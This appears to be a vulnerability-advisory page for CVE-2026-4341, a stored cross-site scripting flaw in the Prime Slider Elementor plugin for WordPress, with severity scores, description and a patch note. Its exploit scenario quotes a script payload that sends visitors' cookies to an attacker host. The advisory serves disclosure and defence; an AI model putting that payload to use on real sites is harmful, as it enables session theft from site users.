Skip to main content

PHP EUVD-2026-20046

| CVE-2026-4341 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-08 Wordfence GHSA-p356-q857-c7qx
6.4
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

3
EUVD ID Assigned
Apr 08, 2026 - 04:30 euvd
EUVD-2026-20046
Analysis Generated
Apr 08, 2026 - 04:30 vuln.today
CVE Published
Apr 08, 2026 - 03:36 nvd
MEDIUM 6.4

DescriptionCVE.org

The Prime Slider - Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'follow_us_text' setting of the Mount widget in all versions up to, and including, 4.1.10. This is due to insufficient input sanitization and output escaping. Specifically, the render_social_link() function in modules/mount/widgets/mount.php outputs the follow_us_text Elementor widget setting using echo without any escaping function. The setting value is stored in _elementor_data post meta via update_post_meta. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored Cross-Site Scripting in Prime Slider - Addons for Elementor plugin allows authenticated users with Author-level access to inject arbitrary JavaScript through the 'follow_us_text' setting in the Mount widget. The vulnerability exists in all versions up to 4.1.10 due to missing output escaping in the render_social_link() function, enabling attackers to execute malicious scripts whenever pages containing the injected widget are viewed. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment The CVSS 6.4 score reflects a medium-severity vulnerability with network attack vector, low complexity, and low integrity/confidentiality impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with WordPress Author credentials (either created by a site admin or obtained through credential compromise) navigates to a page using the Prime Slider Mount widget, edits the widget settings, and injects JavaScript such as `<script>fetch('http://attacker.com/log?cookie='+document.cookie)</script>` into the 'follow_us_text' field. The payload is stored in the page's _elementor_data post meta. …
Remediation Update the Prime Slider - Addons for Elementor plugin to version 4.1.11 or later, which contains patches that add proper output escaping to the render_social_link() function. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-20046 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy